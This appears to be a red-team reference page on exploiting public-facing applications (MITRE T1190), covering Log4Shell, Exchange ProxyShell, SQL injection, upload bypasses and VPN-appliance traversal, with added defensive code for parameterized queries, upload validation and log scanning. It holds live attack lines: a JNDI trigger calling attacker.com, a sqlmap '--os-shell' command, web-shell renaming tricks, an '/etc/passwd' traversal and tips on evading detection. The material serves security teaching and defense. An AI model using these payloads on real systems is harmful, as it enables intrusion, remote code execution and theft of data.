Exploit Public-Facing Application (T1190)

The Internet-facing perimeter is the castle wall. One crack (unpatched software) lets the army in.

1. Known Vulnerabilities (N-Days)

Red teams rarely burn 0-days. We use "1-days" or "N-days": bugs that were patched last month but that the client still hasn't applied.

A. Log4Shell (CVE-2021-44228)

The gift that keeps on giving. Log4j 2, the Java logging library, evaluates ${jndi:...} lookups inside logged strings, so a lookup that points at an attacker-controlled LDAP server can load and execute a remote class. Patched versions disable message lookups, but unpatched copies bundled inside third-party products linger for years.

  • Trigger: ${jndi:ldap://attacker.com/exploit}
  • Injection points: anything the application logs, typically User-Agent, search bars, login forms.

B. Microsoft Exchange (ProxyShell / ProxyNotShell)

Chains path traversal and SSRF on the Exchange front end to write a web shell on the server.

  • Impact: Pre-auth RCE as SYSTEM on the Exchange server (ProxyShell; the ProxyNotShell chain needs valid credentials first).

2. Web Application Attacks

Flaws in the client's own custom code, so there is no vendor patch level to check for.

SQL Injection (SQLi)

Extract data, or on MSSQL get a shell via xp_cmdshell (only when it is enabled and the application's DB account is sysadmin). Manual test: id=1' -> syntax error in the response. Tools: sqlmap.

sqlmap -u "http://target.com/item?id=1" --os-shell
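The manual test above seen from the code side, as an added example that is not from the original page: a Python/sqlite3 lookup that pastes id into the query next to the parameterized version that is the fix. The table, rows and function names are constructed for this demonstration.

```python
"""Vulnerable string-built SQL next to the parameterized fix (Python + sqlite3).

All names and data are constructed for this demonstration.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory table standing in for the /item?id= backend.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?, ?)",
        [(1, "widget", "public"), (2, "gadget", "internal-only")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, item_id: str) -> list:
    # The 'before': the request parameter is pasted straight into SQL text,
    # so a stray quote changes the statement instead of the value.
    sql = f"SELECT name FROM items WHERE id = {item_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, item_id: str) -> list:
    # The fix: the value is bound as a parameter and can never become SQL.
    rows = conn.execute("SELECT name FROM items WHERE id = ?", (item_id,))
    return [row[0] for row in rows]


def manual_test(conn: sqlite3.Connection, fn, item_id: str) -> str:
    """Reproduce the id=1' probe: a database syntax error is the tell."""
    try:
        rows = fn(conn, item_id)
    except sqlite3.OperationalError:
        return "SYNTAX_ERROR"
    return "OK" if rows else "NO_ROWS"


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_vulnerable, lookup_safe):
        print(fn.__name__, "id=1':", manual_test(db, fn, "1'"))
        print(fn.__name__, "id=1 OR 1=1:", manual_test(db, fn, "1 OR 1=1"))
```

The same probe against the parameterized lookup returns no rows and no error, because the quote is treated as data; that absence of a syntax error is what the manual test is looking for on a hardened endpoint.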

File Upload

Uploading a web shell (see Resource Development).

  • Bypass: Rename shell.php to shell.php.jpg or shell.phtml.
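Added example of the server-side validation that defeats the renaming trick above; this is not code from the original page. It assumes an image-only upload endpoint, and the allowlist, magic-byte table and function names are constructed for the demonstration.

```python
"""Server-side upload validation: allowlist, content check, server-chosen name.

Assumes an image-only upload endpoint; all names and constants are constructed.
"""
import os
import secrets
from typing import Optional, Tuple

# Allowed extensions mapped to the magic bytes their content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, stored_name); stored_name is None on rejection."""
    # Drop any client-supplied directory components (both separator styles).
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return False, "no extension", None
    ext = base.rsplit(".", 1)[1].lower()
    # Allowlist on the final extension only: shell.phtml stops here.
    if ext not in ALLOWED:
        return False, f"extension .{ext} is not allowed", None
    # Content must match the declared type: shell.php.jpg holding PHP stops here.
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared type", None
    # The original name, including any extra extensions in it, is discarded;
    # the stored file gets a random server-chosen name plus the checked extension.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return True, "ok", stored


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # constructed minimal JPEG prefix
    for name, blob in [("shell.phtml", b"<?php"), ("shell.php.jpg", b"<?php"),
                       ("../../photo.jpg", jpeg)]:
        print(name, "->", validate_upload(name, blob))
```

The magic-byte check is not a defense on its own (a file can carry a valid image header and still contain script), so the stored file should live outside the web root or in a location where the server never executes scripts; the random name and the single checked extension are what make the double-extension trick irrelevant.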

3. IoT and VPN Appliances

Fortinet, Pulse Secure and Citrix appliances are often left on old firmware.

  • Check: Shodan's favicon hash can narrow an appliance down to a specific version.
  • Exploit: usually directory traversal (../../etc/passwd) to read files that hold session cookies.
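Added detection example covering both the Log4Shell trigger from section 1A and the traversal pattern here; it is not from the original page. It assumes access logs in combined format with referer and User-Agent fields, and the sample lines, client IPs and the attacker.example hostname are constructed for the demonstration.

```python
"""Flag JNDI lookups and path traversal in web access logs.

Constructed sample log (combined format with referer and User-Agent); the IPs,
paths and attacker.example hostname are made up for this demonstration.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

SAMPLE_LOG = r'''
203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /search?q=laptop HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET /search?q=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.11 - - [10/Dec/2021:12:00:04 +0000] "GET /portal/../../etc/passwd HTTP/1.1" 404 0 "-" "curl/7.79.1"
203.0.113.12 - - [10/Dec/2021:12:00:05 +0000] "GET /download?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0 "-" "curl/7.79.1"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The Log4Shell trigger: a ${jndi: lookup anywhere in a logged field.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A '..' segment delimited by a path or query separator (checked after decoding).
TRAVERSAL_RE = re.compile(r"(?:^|[/\\?=&;])\.\.(?:[/\\]|$)")


def fully_decode(value: str, rounds: int = 3) -> str:
    # Percent-decode until the string stops changing so layered encoding
    # cannot hide the pattern from the check.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_jndi(*fields: str) -> bool:
    return any(JNDI_RE.search(fully_decode(f)) for f in fields)


def is_traversal(path: str) -> bool:
    return TRAVERSAL_RE.search(fully_decode(path)) is not None


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, finding) pairs for every suspicious request."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: count these separately in production
        if has_jndi(m["path"], m["ua"], m["referer"]):
            findings.append((m["ip"], "jndi_lookup"))
        if is_traversal(m["path"]):
            findings.append((m["ip"], "path_traversal"))
    return findings


if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(f"{ip:<14} {finding}")
```

Two design points: the JNDI check runs over every logged field, not just the URL, because the injection points listed in 1A are whatever the application writes to its log; and both checks run on the decoded value, since the raw line is what the web server recorded, not what the application eventually processed.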

OpSec

  • Exploits are noisy: they often crash services, and a crashed service gets a ticket and someone reading logs.
  • Scanning: don't run nuclei against the main production server at 100 threads. Throttle the rate and concurrency instead.